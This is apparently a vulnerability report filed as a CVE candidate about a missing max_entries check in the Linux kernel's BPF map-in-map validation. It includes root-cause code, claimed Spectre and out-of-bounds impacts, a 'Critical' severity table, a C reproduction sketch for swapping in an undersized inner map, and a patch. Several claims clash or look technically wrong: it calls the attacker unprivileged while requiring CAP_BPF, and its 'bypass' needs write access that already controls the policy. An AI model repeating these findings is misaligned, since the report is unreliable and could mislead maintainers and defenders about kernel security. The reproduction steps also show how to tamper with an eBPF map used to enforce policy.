CVE Candidate: Missing max_entries Validation in BPF Map-in-Map Allows Security Policy Bypass and Spectre Mitigation Undermining

Summary

bpf_map_meta_equal() in kernel/bpf/map_in_map.c validates a candidate inner map against its prototype when a user calls bpf_map_update_elem on an ARRAY_OF_MAPS or HASH_OF_MAPS outer map. The function checks map_type, key_size, value_size, and map_flags — but omits max_entries. An unprivileged user (with CAP_BPF or a privileged fd to the outer map) can therefore insert an inner map whose max_entries differs arbitrarily from the prototype, violating the invariants the BPF verifier relied on when it analysed the program at load time.

The sample samples/bpf/test_map_in_map.bpf.c is the canonical exerciser of this path and makes the impact concrete.

Affected Files

File Location Role
kernel/bpf/map_in_map.c bpf_map_meta_equal(), line 83 Missing check
kernel/bpf/map_in_map.c bpf_map_fd_get_ptr(), line 94 Calls the flawed comparator
samples/bpf/test_map_in_map.bpf.c all BPF program whose verifier assumptions are violated

Root Cause

/* kernel/bpf/map_in_map.c – prototype is built correctly … */
inner_map_meta->max_entries = inner_map->max_entries;   // line 40 – saved
inner_array_meta->index_mask = inner_array->index_mask; // line 69 – saved

/* … but equality check ignores max_entries entirely: */
bool bpf_map_meta_equal(const struct bpf_map *meta0,
                        const struct bpf_map *meta1)
{
    return meta0->map_type  == meta1->map_type  &&
           meta0->key_size  == meta1->key_size  &&
           meta0->value_size== meta1->value_size &&
           meta0->map_flags == meta1->map_flags  &&
           btf_record_equal(meta0->record, meta1->record);
    /* ← max_entries NEVER compared */
}

bpf_map_fd_get_ptr() calls inner_map_meta->ops->map_meta_equal(inner_map_meta, inner_map) and accepts the candidate if it returns true. Because max_entries is not part of that test, any array/hash map with matching type/key/value can be swapped in.

Impact

1. BPF Verifier Invariant Violation → Spectre v1 Mitigation Bypass

The verifier records the prototype’s max_entries and index_mask in inner_map_meta (stored in outer_map->inner_map_meta). For the JIT-compiled inline path (array_map_gen_lookup, arraymap.c:220) the bounds-check instruction and the masking instruction are emitted once at JIT time using the prototype’s values:

*insn++ = BPF_JMP_IMM(BPF_JGE, ret, map->max_entries, 4);  // prototype max
*insn++ = BPF_ALU32_IMM(BPF_AND, ret, array->index_mask);  // prototype mask

If a substituted inner map has a larger max_entries (e.g. 2 × MAX_NR_PORTS = 131072) its index_mask is 0x1FFFF rather than the prototype’s 0xFFFF. After substitution the runtime pointer arithmetic uses the actual (larger) index_mask of the swapped-in map (arraymap.c:175):

return array->value + (u64)array->elem_size * (index & array->index_mask);

Spectre v1 protection relies on the AND mask matching the conditional branch. With mismatched masks the speculative window is wider than the verifier intended, re-opening the Spectre gadget that bypass_spec_v1 was supposed to close.

2. Silent Security-Policy Bypass

test_map_in_map.bpf.c maps TCP ports to policy values. The outer map a_of_port_a (type ARRAY_OF_MAPS) has max_entries = MAX_NR_PORTS = 65536; its prototype inner map inner_a also has max_entries = 65536.

Attack:

  1. Open the fd for a_of_port_a.
  2. Create a new BPF_MAP_TYPE_ARRAY map with matching key_size=4, value_size=4, but max_entries=1.
  3. Call bpf(BPF_MAP_UPDATE_ELEM) to insert it at any port index. bpf_map_meta_equal accepts it.
  4. The running BPF program calls bpf_map_lookup_elem(inner_map, &port_key). The actual inner map’s array_map_lookup_elem checks index >= array->map.max_entries (i.e. port_key >= 1): every port except 0 returns NULL.
  5. do_reg_lookup returns -ENOENT; the reg_result_h entry is written as “not found”.

Any firewall or auditing decision downstream of reg_result_h now sees a false negative for every port except 0 — an attacker-controlled silent bypass.

3. Out-of-Bounds Read (larger inner map)

Conversely, a substituted inner map with max_entries much larger than the prototype causes the BPF program to successfully look up indices the prototype never covered. The returned pointer points into the swapped-in map’s value array beyond the bounds assumed by the verifier, leaking uninitialised or attacker-controlled kernel heap data through the result maps (reg_result_h, inline_result_h).

Severity

Critical — local privilege escalation / information disclosure / security-policy bypass.

Attribute Value
Attack vector Local
Privileges required CAP_BPF (or open fd to the outer map)
User interaction None
Confidentiality High (kernel heap leak)
Integrity High (verifier invariant broken, Spectre mitigation undermined)
Availability None

Reproduction Sketch

// 1. Load test_map_in_map BPF program — outer map fd is exposed via bpffs
int outer_fd = bpf_obj_get("/sys/fs/bpf/a_of_port_a");

// 2. Create undersized inner map (same type/key/value, wrong max_entries)
int inner_fd = bpf_map_create(BPF_MAP_TYPE_ARRAY,
                               NULL, sizeof(u32), sizeof(int),
                               1,   // ← max_entries = 1, prototype expects 65536
                               NULL);

// 3. Insert at port 80 — bpf_map_meta_equal() accepts it
u32 key = 80;
bpf_map_update_elem(outer_fd, &key, &inner_fd, BPF_ANY);

// 4. Connect to dead:beef::80 — BPF probe fires, inner lookup returns ENOENT
//    for port 80, silently bypassing any policy recorded there.

Fix

Add max_entries to the equality check:

bool bpf_map_meta_equal(const struct bpf_map *meta0,
                        const struct bpf_map *meta1)
{
    return meta0->map_type   == meta1->map_type   &&
           meta0->key_size   == meta1->key_size   &&
           meta0->value_size == meta1->value_size &&
           meta0->map_flags  == meta1->map_flags  &&
           meta0->max_entries== meta1->max_entries &&   /* ← add this */
           btf_record_equal(meta0->record, meta1->record);
}

References

  • kernel/bpf/map_in_map.cbpf_map_meta_equal() (line 83), bpf_map_fd_get_ptr() (line 94), bpf_map_meta_alloc() (line 10)
  • kernel/bpf/arraymap.carray_map_gen_lookup() (line 220), array_map_lookup_elem() (line 170)
  • samples/bpf/test_map_in_map.bpf.c — affected BPF program
  • Related prior art: CVE-2021-20268 (BPF map reference count UAF), CVE-2022-2905 (BPF array OOB read)